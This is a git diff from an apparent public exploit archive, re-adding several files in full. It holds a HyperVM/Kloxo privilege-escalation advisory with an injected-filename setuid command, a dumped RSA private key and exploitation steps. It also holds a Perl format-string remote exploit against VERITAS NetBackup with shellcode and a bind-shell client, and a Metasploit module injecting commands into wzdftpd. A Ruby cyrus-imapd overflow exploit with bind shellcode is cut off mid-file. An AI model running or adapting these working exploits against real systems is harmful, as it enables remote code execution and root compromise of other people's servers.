@@ -1,93 +1,93 @@ -HyperVM is a virtualization application that runs off a host node and can provide -several Virtual Private Servers. There is a previously unreported vulnerability in -HyperVM/Kloxo. - -It was originally documented in ISSUE 14 by an anonymous author: -http://www.milw0rm.com/exploits/8880 - -It turns out that he was showing how a root shell can be created: - - [user1@testing574 tmp]$ ls -al - total 28 - drwxrwxrwt 4 root root 4096 May 21 08:41 . - drwxr-xr-x 24 root root 4096 May 19 16:57 .. - -rw-rw-r-- 1 user1 user1 0 May 21 08:40 ;cd ..;chown root.root shell;chmod 4755 shell; - drwx------ 2 root root 4096 May 21 08:41 backupPdUzR4 - -rwsr-xr-x 1 root root 5056 May 21 08:41 shell - -rw-rw-r-- 1 user1 user1 89 May 21 08:33 shell.c - -This is pointless, because after a 'restore from backup' in HyperVM, it creates that folder -"backupPdUzR4" - -Let's take a look at it...On a VM I tested, even the directory was readable. -$ ls -lha /tmp/backupfileIy00MO/ -total 36K -drwxr-xr-x 2 root root 4.0K Dec 12 02:18 . -drwxr-xr-x 3 root root 4.0K Dec 12 10:37 .. --rw-r--r-- 1 root root 15K Dec 12 00:46 hypervm.file --rw-r--r-- 1 root root 11K Dec 12 00:46 hypervm.metadata - -World readable files. In it, root passwords in plain text. Including username, RSA private keys and lots more. - -Here the VM type is shown, it appears to be OpenVZ: -$ cat hypervm.file -al_list";a:0:{}s:13:"__object_list";N;s:9:"subaction";N;s:8:"dbaction";s:5:"clean";s:12:"metadbaction";s:3:"all";s:7:"__class";s:11:"vps__op -envz"; - ---snip-- -Private keys! 
-"hostname";s:8:"fakevps";s:12:"use -rname";s:10:"fakeusername";s:16:"text_private_key";s:887:"-----BEGIN RSA PRIVATE KEY----- -FIICXZIBAAKBgQDdehG9ScmFWL3AZHeXqm2oljMRbyic7dlfGv9E3tMyWgWCSnF9 -dJ/gI+NoY1ygic52NJEAB1/blDtZMDnx3ze4wf79p9rGzAuT5N+yKqleMdlwozQC -Lf17blSAQAXPi84Sy95huIMR9vZ/fPDOi7ucHWSk8aaqVI5JY8QpSewoVQIDAQAB -AoGBAKVT7E4a+L38AmoHlWa4KGfCx5hqHC0ZODzQkGG+3HUn0hjyrUlzd6z/3VAd -bBXDCUYf82XMY3h0bOElKPwvHw3+sgUyceSBONLa9pi+He/6ljwR0/LG6XjctdLH -RwVNTEXY/JS15VRKyyXMdohhVbIXa3NjbMqvIBEJPmnjVlWBAkEA90xPi9te3HYj -54uH7/+cEuZ9TlLyeB9+MQ0t7MfqNY1v2PRK+h4J6y4N+v43o9kkN7RGR3zd5Bww -qP/TEfBL8QJBAOVFKGMwkY/2dhqKjnHC2rkN8B5Hn8Px2quf7SXn2tgnuZRYOxah -WAtzdZSt64Vsaz+3fh6tIZ6YYQo/BYJMlqUCQD/UpIWPmZrCqJgVLn/n9kvu0xSh -V1ZpkvNo2p1RMwamP+S7lIujq53aYuOUM5sKGM6ErMwR0VrtaCaI/N2ZspECQBZn -P58Rq+epabkGOQ0cwUq79e6/iPkYtQl4QzAlC9kRF61LQdrgQT49NgwlQpJzGbfM -TmLFADgDI9hgeCVXXpECQQC0c5owQrCx38xtZp6dydAccnHo4jrC83lRL6Epxueo -i+3UYzuVxCQkBdhoF/5nsXv5Qh914MHGnH12qepPokyjd ------END RSA PRIVATE KEY----- -";s:15:"text_public_key";s:1188:"-----BEGIN CERTIFICATE----- -BIIDfPzCCAqigAwIBAgIBADANBgkqhkiG9w0BAQUFADB5MRMwEQYDNQDEwpseGxh -YnMuY29tMQswCQYDVQQGEwJJTjELMAkGA1UECBMCaW4xCzAJBgNVBAcTAmluMQsw -CQYDVQQKEwJseDENMAsGA1UECxMEc29mdDEfMB0GCSqGSIb3DQEJAUYQYWRtaW5A -bHhsYWJzLmNvbTAeFw0wOTA2MTExMzAyNDdaFw0xMDA2MTExMzAyNDdaMHkxEzAR -BgNVBAMTCmx4bGFicy9jb20xCzAJBgNVBAYTAklOMQswCQYDVQQIEwJpbjELMAkG -Z2UEBxMCaW4xCzAJBgNVBAoTAmx4MQ0wCwYDVQQLEwRzb3Z0MR8wHQYJKoZIhvcN -AQkBFhBhZG1pbkBseGxhYnMuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB -gQDdehG9ScmFWL2AZHeXqm2oljMRbyic7dlfGv9E3tMyWgWCSnF9dJ/gI+NoY1yg -ic52NJEAB1/blDtZMDnx3ze4wf79p9rGzAuT5N+yKqleMdlwozQCLf17blSAQAXP -i94Sy95huIMR9vZ/fPDOi7ucHWSk8aaqVI5JY7QpSewoVQIDAQABo4KWMIHTMB0G -A1UdDgQWBBRMXffyd+fJWt/iYe1jteuLL8UukzCBowYDVR0jBIGbMIGYgBRMXffy -d+fJWt/iYe1jteuLL8Uuk6F9pHsweTETMBEGA1UEAxMKbHhsYWJzLmNvbTELMAkG -A1UEBhMCSU4xCzAJBgNVBAgTAmluMQswCQYDVQQHEwJpbjELMAkGA1UEChMCbHgx -DTALBgNVBAsTBHNvZnQxHzAdBgkqhkiG9w0BCQEWEGFkbWluQGx4bGIicy5jb22C 
-AQAwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOBgQCQnz/9DIzn5CVItRwk -HHMZBLlq3MtmQYmwGuNjiss3UkYC1ehi9LDLfQ4AzJfjUrvBpuksozdfvYlpXnA1 -LAmOniBgyZW0aUStSrSr4czva4d3VMyOqQ/Dgr//i+RSuo4QH+6wI0G/oirE+E6b -uR24why0WWPNsyJU3adesPo4eQf== ------END CERTIFICATE----- - ---snip-- -Root passwords! -sable_reason";s:0:"";s:11:"createstage";s:0:"";s:13:"createmessage";s:0:"";s:12:"rootpassword";s:21:"xxxxxxxxxxxxxxxxxxxx";s:20:"rootpassword_changed";s - -So in summary, here are the exploitation steps: -1. Log into HyperVM/Kloxo -2. Click "Backup Home" -3. In the field labeled "Restore from file", browse for any restore file from the popup box. -4. Wait till the VM has finished restoring from backup. -5. Login. If the root user hasn't deleted these files from /tmp/backupXXXXX before bringing up the network interface, you win. - -Mitigation: -After the VM is restarted, manually delete these files as the root user before anyone else reads them. - -Regards, -Xia Shing Zee - -# milw0rm.com [2009-08-25] +HyperVM is a virtualization application that runs off a host node and can provide +several Virtual Private Servers. There is a previously unreported vulnerability in +HyperVM/Kloxo. + +It was originally documented in ISSUE 14 by an anonymous author: +http://www.milw0rm.com/exploits/8880 + +It turns out that he was showing how a root shell can be created: + + [user1@testing574 tmp]$ ls -al + total 28 + drwxrwxrwt 4 root root 4096 May 21 08:41 . + drwxr-xr-x 24 root root 4096 May 19 16:57 .. + -rw-rw-r-- 1 user1 user1 0 May 21 08:40 ;cd ..;chown root.root shell;chmod 4755 shell; + drwx------ 2 root root 4096 May 21 08:41 backupPdUzR4 + -rwsr-xr-x 1 root root 5056 May 21 08:41 shell + -rw-rw-r-- 1 user1 user1 89 May 21 08:33 shell.c + +This is pointless, because after a 'restore from backup' in HyperVM, it creates that folder +"backupPdUzR4" + +Let's take a look at it...On a VM I tested, even the directory was readable. 
+$ ls -lha /tmp/backupfileIy00MO/ +total 36K +drwxr-xr-x 2 root root 4.0K Dec 12 02:18 . +drwxr-xr-x 3 root root 4.0K Dec 12 10:37 .. +-rw-r--r-- 1 root root 15K Dec 12 00:46 hypervm.file +-rw-r--r-- 1 root root 11K Dec 12 00:46 hypervm.metadata + +World readable files. In it, root passwords in plain text. Including username, RSA private keys and lots more. + +Here the VM type is shown, it appears to be OpenVZ: +$ cat hypervm.file +al_list";a:0:{}s:13:"__object_list";N;s:9:"subaction";N;s:8:"dbaction";s:5:"clean";s:12:"metadbaction";s:3:"all";s:7:"__class";s:11:"vps__op +envz"; + +--snip-- +Private keys! +"hostname";s:8:"fakevps";s:12:"use +rname";s:10:"fakeusername";s:16:"text_private_key";s:887:"-----BEGIN RSA PRIVATE KEY----- +FIICXZIBAAKBgQDdehG9ScmFWL3AZHeXqm2oljMRbyic7dlfGv9E3tMyWgWCSnF9 +dJ/gI+NoY1ygic52NJEAB1/blDtZMDnx3ze4wf79p9rGzAuT5N+yKqleMdlwozQC +Lf17blSAQAXPi84Sy95huIMR9vZ/fPDOi7ucHWSk8aaqVI5JY8QpSewoVQIDAQAB +AoGBAKVT7E4a+L38AmoHlWa4KGfCx5hqHC0ZODzQkGG+3HUn0hjyrUlzd6z/3VAd +bBXDCUYf82XMY3h0bOElKPwvHw3+sgUyceSBONLa9pi+He/6ljwR0/LG6XjctdLH +RwVNTEXY/JS15VRKyyXMdohhVbIXa3NjbMqvIBEJPmnjVlWBAkEA90xPi9te3HYj +54uH7/+cEuZ9TlLyeB9+MQ0t7MfqNY1v2PRK+h4J6y4N+v43o9kkN7RGR3zd5Bww +qP/TEfBL8QJBAOVFKGMwkY/2dhqKjnHC2rkN8B5Hn8Px2quf7SXn2tgnuZRYOxah +WAtzdZSt64Vsaz+3fh6tIZ6YYQo/BYJMlqUCQD/UpIWPmZrCqJgVLn/n9kvu0xSh +V1ZpkvNo2p1RMwamP+S7lIujq53aYuOUM5sKGM6ErMwR0VrtaCaI/N2ZspECQBZn +P58Rq+epabkGOQ0cwUq79e6/iPkYtQl4QzAlC9kRF61LQdrgQT49NgwlQpJzGbfM +TmLFADgDI9hgeCVXXpECQQC0c5owQrCx38xtZp6dydAccnHo4jrC83lRL6Epxueo +i+3UYzuVxCQkBdhoF/5nsXv5Qh914MHGnH12qepPokyjd +-----END RSA PRIVATE KEY----- +";s:15:"text_public_key";s:1188:"-----BEGIN CERTIFICATE----- +BIIDfPzCCAqigAwIBAgIBADANBgkqhkiG9w0BAQUFADB5MRMwEQYDNQDEwpseGxh +YnMuY29tMQswCQYDVQQGEwJJTjELMAkGA1UECBMCaW4xCzAJBgNVBAcTAmluMQsw +CQYDVQQKEwJseDENMAsGA1UECxMEc29mdDEfMB0GCSqGSIb3DQEJAUYQYWRtaW5A +bHhsYWJzLmNvbTAeFw0wOTA2MTExMzAyNDdaFw0xMDA2MTExMzAyNDdaMHkxEzAR 
+BgNVBAMTCmx4bGFicy9jb20xCzAJBgNVBAYTAklOMQswCQYDVQQIEwJpbjELMAkG +Z2UEBxMCaW4xCzAJBgNVBAoTAmx4MQ0wCwYDVQQLEwRzb3Z0MR8wHQYJKoZIhvcN +AQkBFhBhZG1pbkBseGxhYnMuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB +gQDdehG9ScmFWL2AZHeXqm2oljMRbyic7dlfGv9E3tMyWgWCSnF9dJ/gI+NoY1yg +ic52NJEAB1/blDtZMDnx3ze4wf79p9rGzAuT5N+yKqleMdlwozQCLf17blSAQAXP +i94Sy95huIMR9vZ/fPDOi7ucHWSk8aaqVI5JY7QpSewoVQIDAQABo4KWMIHTMB0G +A1UdDgQWBBRMXffyd+fJWt/iYe1jteuLL8UukzCBowYDVR0jBIGbMIGYgBRMXffy +d+fJWt/iYe1jteuLL8Uuk6F9pHsweTETMBEGA1UEAxMKbHhsYWJzLmNvbTELMAkG +A1UEBhMCSU4xCzAJBgNVBAgTAmluMQswCQYDVQQHEwJpbjELMAkGA1UEChMCbHgx +DTALBgNVBAsTBHNvZnQxHzAdBgkqhkiG9w0BCQEWEGFkbWluQGx4bGIicy5jb22C +AQAwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOBgQCQnz/9DIzn5CVItRwk +HHMZBLlq3MtmQYmwGuNjiss3UkYC1ehi9LDLfQ4AzJfjUrvBpuksozdfvYlpXnA1 +LAmOniBgyZW0aUStSrSr4czva4d3VMyOqQ/Dgr//i+RSuo4QH+6wI0G/oirE+E6b +uR24why0WWPNsyJU3adesPo4eQf== +-----END CERTIFICATE----- + +--snip-- +Root passwords! +sable_reason";s:0:"";s:11:"createstage";s:0:"";s:13:"createmessage";s:0:"";s:12:"rootpassword";s:21:"xxxxxxxxxxxxxxxxxxxx";s:20:"rootpassword_changed";s + +So in summary, here are the exploitation steps: +1. Log into HyperVM/Kloxo +2. Click "Backup Home" +3. In the field labeled "Restore from file", browse for any restore file from the popup box. +4. Wait till the VM has finished restoring from backup. +5. Login. If the root user hasn't deleted these files from /tmp/backupXXXXX before bringing up the network interface, you win. + +Mitigation: +After the VM is restarted, manually delete these files as the root user before anyone else reads them. + +Regards, +Xia Shing Zee + +# milw0rm.com [2009-08-25] diff --git a/platforms/multiple/remote/1007.html b/platforms/multiple/remote/1007.html index af961a3ce..db59ead13 100755 --- a/platforms/multiple/remote/1007.html +++ b/platforms/multiple/remote/1007.html @@ -39,7 +39,7 @@ document.getElementById('linkhtml_"+os+"').value",300); +</textarea> +</textarea> +</textarea> +</textarea>

Run exploit - - -# milw0rm.com [2005-05-21] + + +# milw0rm.com [2005-05-21] diff --git a/platforms/multiple/remote/1188.c b/platforms/multiple/remote/1188.c index ba32ef65e..f2923ba10 100755 --- a/platforms/multiple/remote/1188.c +++ b/platforms/multiple/remote/1188.c @@ -142,6 +142,6 @@ int main(int argc, char *argv[]) LocalFree(buf); LocalFree(evil); return 0; -} - -// milw0rm.com [2005-08-30] +} + +// milw0rm.com [2005-08-30] diff --git a/platforms/multiple/remote/1263.pl b/platforms/multiple/remote/1263.pl index 6a856885e..11300f3f9 100755 --- a/platforms/multiple/remote/1263.pl +++ b/platforms/multiple/remote/1263.pl 
@@ -1,153 +1,153 @@ -#!/usr/bin/perl -############################################################## -# VERITAS-Linux.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit -# johnh[at]digitalmunition[dot]com -# bug found by kf_lists[at]digitalmunition[dot]com -# http://www.digitalmunition.com/ -############################################################## - -use POSIX; -use IO::Socket; -use IO::Select; -use strict; - -print STDERR "\nveritas.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit\n"; - -if ($#ARGV == -1) { - print "Usage:\n\t$0 \n\n"; - exit (1); -} - -my $hostName = $ARGV[0]; -my $port = $ARGV[1] || 13722; - -buildexploit ($hostName, $port); - -my $shellport = 5570; -print "[*] Connect to remote shell port\n"; -my $sock = IO::Socket::INET->new ( - Proto => "tcp", - PeerAddr => $hostName, - PeerPort => $shellport, - Type => SOCK_STREAM -); - -if (! $sock) -{ - print "[*] Error, Seems Failed\n"; - exit (0); -} - -print "[*] G0t R00T\n"; - -StartShell ($sock); - -sub buildexploit -{ - my ($host, $port) = @_; - my $s = IO::Socket::INET->new ( - Proto => "tcp", - PeerAddr => $host, - PeerPort => $port, - Type => SOCK_STREAM - ); - - if (! $s) - { - print "[*] Could not create socket: $!\n"; - exit(0); - } - - print $s " 118 1\nOWNED BABY\n"; - print scalar <$s>; - print scalar <$s>; - - my $shellcode = "\x90" x 500 . - "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x16\x81\x73\x17\x13\x99". - "\x37\xe2\x83\xeb\xfc\xe2\xf4\x22\x42\xc0\x01\xa3\xff\x64\xa1\x40". - "\xda\x64\x6b\xf2\xd2\xfa\x62\x9a\x5e\x65\x84\x7b\x8c\xf5\xa1\x75". - "\xca\xbe\x03\xa3\x89\x67\xb3\x44\x10\xd6\x52\x75\x54\xb7\x52\x75". - "\x2a\x33\x2f\x93\xc9\x67\xb5\x9a\x78\x74\x52\x75\x54\xb7\x6b\xca". - "\x10\xf4\x52\x2c\xd0\xfa\x62\x52\x7b\xcf\xb3\x7b\xf7\x18\x91\x7b". - "\xf1\x18\xcd\x71\xf0\xbe\x01\x42\xca\xbe\x03\xa3\x92\xfa\x62"; - my $retloc = 0x080b50ec; #0x080b53b4; - my $retaddr = 0x80e0658; # can't use shellcode in stack. 
- my $hi = ($retaddr >> 0) & 0xffff; - my $lo = ($retaddr >> 16) & 0xffff; - - - $hi = $hi - 0x28; - $lo = (0x10000 + $lo + 0x28) - $hi - 0x50; - - my $align = 3; - my $buffer = " 101 6\n" . "a" x $align . pack ('l', $retloc) . pack ('l', $retloc + 2) . - "%." . $hi . "lx" . "%1694\$hn" . - "%." . $lo . "lx" . "%1695\$hn" . - $shellcode . "\n" . - $shellcode . "\n" . - "i\n" . "0wned\n" . "y0u\n". - "boot.ini\n" . "\n"; - - print STDERR "Sending " .length($buffer) . " bytes to remote\n"; - sleep (10); - print $s $buffer; - print scalar <$s>; - - close $s; -} - -sub StartShell -{ - my ($client) = @_; - my $sel = IO::Select->new(); - - - # unbuffered fun. - - - Unblock(*STDIN); - Unblock(*STDOUT); - Unblock($client); - - select($client); $|++; - select(STDIN); $|++; - select(STDOUT); $|++; - - $sel->add($client); - $sel->add(*STDIN); - - while (fileno($client)) - { - my $fd; - my @fds = $sel->can_read(1); - - foreach $fd (@fds) - { - my $in = <$fd>; - if (! $in || ! $fd || ! $client) - { - print "[*] Closing connection.\n"; - close($client); - exit(0); - } - - if ($fd eq $client) - { - print STDOUT $in; - } else { - print $client $in; - } - } - } - close ($client); - exit (0); -} - -sub Unblock { - my $fd = shift; - my $flags; - $flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n"; - fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n"; -} - -# milw0rm.com [2005-10-20] +#!/usr/bin/perl +############################################################## +# VERITAS-Linux.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit +# johnh[at]digitalmunition[dot]com +# bug found by kf_lists[at]digitalmunition[dot]com +# http://www.digitalmunition.com/ +############################################################## + +use POSIX; +use IO::Socket; +use IO::Select; +use strict; + +print STDERR "\nveritas.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit\n"; + +if ($#ARGV == -1) { + print "Usage:\n\t$0 \n\n"; 
+ exit (1); +} + +my $hostName = $ARGV[0]; +my $port = $ARGV[1] || 13722; + +buildexploit ($hostName, $port); + +my $shellport = 5570; +print "[*] Connect to remote shell port\n"; +my $sock = IO::Socket::INET->new ( + Proto => "tcp", + PeerAddr => $hostName, + PeerPort => $shellport, + Type => SOCK_STREAM +); + +if (! $sock) +{ + print "[*] Error, Seems Failed\n"; + exit (0); +} + +print "[*] G0t R00T\n"; + +StartShell ($sock); + +sub buildexploit +{ + my ($host, $port) = @_; + my $s = IO::Socket::INET->new ( + Proto => "tcp", + PeerAddr => $host, + PeerPort => $port, + Type => SOCK_STREAM + ); + + if (! $s) + { + print "[*] Could not create socket: $!\n"; + exit(0); + } + + print $s " 118 1\nOWNED BABY\n"; + print scalar <$s>; + print scalar <$s>; + + my $shellcode = "\x90" x 500 . + "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x16\x81\x73\x17\x13\x99". + "\x37\xe2\x83\xeb\xfc\xe2\xf4\x22\x42\xc0\x01\xa3\xff\x64\xa1\x40". + "\xda\x64\x6b\xf2\xd2\xfa\x62\x9a\x5e\x65\x84\x7b\x8c\xf5\xa1\x75". + "\xca\xbe\x03\xa3\x89\x67\xb3\x44\x10\xd6\x52\x75\x54\xb7\x52\x75". + "\x2a\x33\x2f\x93\xc9\x67\xb5\x9a\x78\x74\x52\x75\x54\xb7\x6b\xca". + "\x10\xf4\x52\x2c\xd0\xfa\x62\x52\x7b\xcf\xb3\x7b\xf7\x18\x91\x7b". + "\xf1\x18\xcd\x71\xf0\xbe\x01\x42\xca\xbe\x03\xa3\x92\xfa\x62"; + my $retloc = 0x080b50ec; #0x080b53b4; + my $retaddr = 0x80e0658; # can't use shellcode in stack. + my $hi = ($retaddr >> 0) & 0xffff; + my $lo = ($retaddr >> 16) & 0xffff; + + + $hi = $hi - 0x28; + $lo = (0x10000 + $lo + 0x28) - $hi - 0x50; + + my $align = 3; + my $buffer = " 101 6\n" . "a" x $align . pack ('l', $retloc) . pack ('l', $retloc + 2) . + "%." . $hi . "lx" . "%1694\$hn" . + "%." . $lo . "lx" . "%1695\$hn" . + $shellcode . "\n" . + $shellcode . "\n" . + "i\n" . "0wned\n" . "y0u\n". + "boot.ini\n" . "\n"; + + print STDERR "Sending " .length($buffer) . 
" bytes to remote\n"; + sleep (10); + print $s $buffer; + print scalar <$s>; + + close $s; +} + +sub StartShell +{ + my ($client) = @_; + my $sel = IO::Select->new(); + + + # unbuffered fun. + + + Unblock(*STDIN); + Unblock(*STDOUT); + Unblock($client); + + select($client); $|++; + select(STDIN); $|++; + select(STDOUT); $|++; + + $sel->add($client); + $sel->add(*STDIN); + + while (fileno($client)) + { + my $fd; + my @fds = $sel->can_read(1); + + foreach $fd (@fds) + { + my $in = <$fd>; + if (! $in || ! $fd || ! $client) + { + print "[*] Closing connection.\n"; + close($client); + exit(0); + } + + if ($fd eq $client) + { + print STDOUT $in; + } else { + print $client $in; + } + } + } + close ($client); + exit (0); +} + +sub Unblock { + my $fd = shift; + my $flags; + $flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n"; + fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n"; +} + +# milw0rm.com [2005-10-20] diff --git a/platforms/multiple/remote/1292.pm b/platforms/multiple/remote/1292.pm index af4d99739..ca900a8de 100755 --- a/platforms/multiple/remote/1292.pm +++ b/platforms/multiple/remote/1292.pm 
@@ -1,148 +1,148 @@ -# Reference: http://www.milw0rm.com/id.php?id=1231 (kcope) /str0ke - -# -# Metasploit plugin for: Wzdftpd SITE Command Arbitrary Command Execution -# 2005 11 26 - David Maciejak -# - -package Msf::Exploit::wzdftpd_site; -use base "Msf::Exploit"; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = { - 'Name' => 'Wzdftpd SITE Command Arbitrary Command Execution', - 'Version' => '$Revision: 1.0 $', - 'Authors' => [ 'David Maciejak ' ], - 'Arch' => [ ], - 'OS' => [ ], - 'Priv' => 1, - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 21], - 'USER' => [1, 'DATA', 'Username', 'guest'], - 'PASS' => [1, 'DATA', 'Password', '%'], - 'SITECMD'=> [1, 'DATA', 'Custom site command'], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This module exploits an arbitrary command execution vulnerability in Wzdftpd - threw SITE command. Wzdftpd version to 0.5.4 are vulnerable. -}), - 'Refs' => - [ - ['BID', '14935'], - ], - - 'Payload' => - { - 'Space' => 128, - 'Keys' => ['cmd','cmd_bash'], - }, - - 'Keys' => ['wzdftpd_site'], - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Check { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - ); - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return $self->CheckCode('Connect'); - } - my $res = $s->Recv(-1, 5); - $s->Close(); - - if (! 
$res) { - $self->PrintLine("[*] No FTP banner"); - return $self->CheckCode('Unknown'); - } - - if ($res =~ /220 wzd server ready/) - { - $self->PrintLine("[*] FTP Server is a wzdftpd server"); - return $self->CheckCode('Appears'); - } - else - { - $self->PrintLine("[*] FTP Server is probably not vulnerable"); - return $self->CheckCode('Safe'); - } -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $custom_site_cmd=$self->GetVar('SITECMD'); - my $encodedPayload = $self->GetVar('EncodedPayload'); - my $cmd = $encodedPayload->RawPayload; - my $user = $self->GetVar('USER'); - my $pass = $self->GetVar('PASS'); - - my $s = Msf::Socket::Tcp->new( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - ); - - if ($s->IsError){ - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - $self->PrintLine("[*] Establishing a connection to the FTP server ..."); - - $s->Send("USER ".$user); - - my $result = $s->Recv(-1, 20); - if (!($result=~/\d{3} User .+ okay, need password/)) - { - $self->PrintLine("[*] Invalid user"); - return; - } - - $s->Send("PASS ".$pass); - $result = $s->Recv(-1, 20); - - if (!($result=~/\d{3} User logged in/)) - { - $self->PrintLine("[*] Invalid password"); - return; - } - - $s->Send("SITE ".$custom_site_cmd." 
| $cmd;"); - $result = $s->Recv(-1, 20); - if (!($result=~/^200/)) - { - $self->PrintLine("[*] Error: $result"); - return; - } - - $self->PrintLine(''); - my @results = split ( /\n/, $result ); - chomp @results; - for (my $i = 1; $i < @results -1; $i++){ - $self->PrintLine("$results[$i]"); - } - return; -} - -1; - -# milw0rm.com [2005-11-04] +# Reference: http://www.milw0rm.com/id.php?id=1231 (kcope) /str0ke + +# +# Metasploit plugin for: Wzdftpd SITE Command Arbitrary Command Execution +# 2005 11 26 - David Maciejak +# + +package Msf::Exploit::wzdftpd_site; +use base "Msf::Exploit"; +use strict; +use Pex::Text; + +my $advanced = { }; + +my $info = { + 'Name' => 'Wzdftpd SITE Command Arbitrary Command Execution', + 'Version' => '$Revision: 1.0 $', + 'Authors' => [ 'David Maciejak ' ], + 'Arch' => [ ], + 'OS' => [ ], + 'Priv' => 1, + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 21], + 'USER' => [1, 'DATA', 'Username', 'guest'], + 'PASS' => [1, 'DATA', 'Password', '%'], + 'SITECMD'=> [1, 'DATA', 'Custom site command'], + }, + + 'Description' => Pex::Text::Freeform(qq{ + This module exploits an arbitrary command execution vulnerability in Wzdftpd + threw SITE command. Wzdftpd version to 0.5.4 are vulnerable. +}), + 'Refs' => + [ + ['BID', '14935'], + ], + + 'Payload' => + { + 'Space' => 128, + 'Keys' => ['cmd','cmd_bash'], + }, + + 'Keys' => ['wzdftpd_site'], + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Check { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + ); + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return $self->CheckCode('Connect'); + } + my $res = $s->Recv(-1, 5); + $s->Close(); + + if (! 
$res) { + $self->PrintLine("[*] No FTP banner"); + return $self->CheckCode('Unknown'); + } + + if ($res =~ /220 wzd server ready/) + { + $self->PrintLine("[*] FTP Server is a wzdftpd server"); + return $self->CheckCode('Appears'); + } + else + { + $self->PrintLine("[*] FTP Server is probably not vulnerable"); + return $self->CheckCode('Safe'); + } +} + +sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $custom_site_cmd=$self->GetVar('SITECMD'); + my $encodedPayload = $self->GetVar('EncodedPayload'); + my $cmd = $encodedPayload->RawPayload; + my $user = $self->GetVar('USER'); + my $pass = $self->GetVar('PASS'); + + my $s = Msf::Socket::Tcp->new( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + ); + + if ($s->IsError){ + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + + $self->PrintLine("[*] Establishing a connection to the FTP server ..."); + + $s->Send("USER ".$user); + + my $result = $s->Recv(-1, 20); + if (!($result=~/\d{3} User .+ okay, need password/)) + { + $self->PrintLine("[*] Invalid user"); + return; + } + + $s->Send("PASS ".$pass); + $result = $s->Recv(-1, 20); + + if (!($result=~/\d{3} User logged in/)) + { + $self->PrintLine("[*] Invalid password"); + return; + } + + $s->Send("SITE ".$custom_site_cmd." | $cmd;"); + $result = $s->Recv(-1, 20); + if (!($result=~/^200/)) + { + $self->PrintLine("[*] Error: $result"); + return; + } + + $self->PrintLine(''); + my @results = split ( /\n/, $result ); + chomp @results; + for (my $i = 1; $i < @results -1; $i++){ + $self->PrintLine("$results[$i]"); + } + return; +} + +1; + +# milw0rm.com [2005-11-04] diff --git a/platforms/multiple/remote/201.c b/platforms/multiple/remote/201.c index 1ecfd1714..953ea8b1b 100755 --- a/platforms/multiple/remote/201.c +++ b/platforms/multiple/remote/201.c @@ -540,6 +540,6 @@ char **argv; exit(0); } - - -// milw0rm.com [2000-11-21] + + +// milw0rm.com [2000-11-21] 
diff --git a/platforms/multiple/remote/2053.rb b/platforms/multiple/remote/2053.rb index 0c83b3697..235d810cb 100755 --- a/platforms/multiple/remote/2053.rb +++ b/platforms/multiple/remote/2053.rb 
@@ -1,87 +1,87 @@ -#!/usr/bin/ruby -# -# cyrus-imapd pop3d exploit -# by bannedit -# -# 05/23/2006 -# This exploit takes advantage of a stack based overflow. -# Once the stack corruption has occured it is possible -# to overwrite a pointer which is later used for a memcpy -# this gives us a write anything anywhere condition similar -# to a format string vulnerability. -# -# I choose to overwrite the GOT table with my shellcode and -# return to it. This defeats the VA random patch and possibly -# other stack protection features. -# -# tested on gentoo-sources linux 2.6.16 - - - -require 'socket' - -#will add targets for other linux distros -targets = { 'linux 2.6' => '0x080fd318', 'linux 2.6 Hardened' => '', 'freebsd' => '' } - - -#metasploit bind shellcode by skape 84 bytes port 4444# - -shellcode = -"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"+ -"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"+ -"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"+ -"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"+ -"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"+ -"\x89\xe1\xcd\x80" - - -puts "--[cyrus imapd pop3 popsubfolders exploit" -puts "----[by bannedit" -puts "-----------------------------------------" - -case ARGV.length - -when 0 - 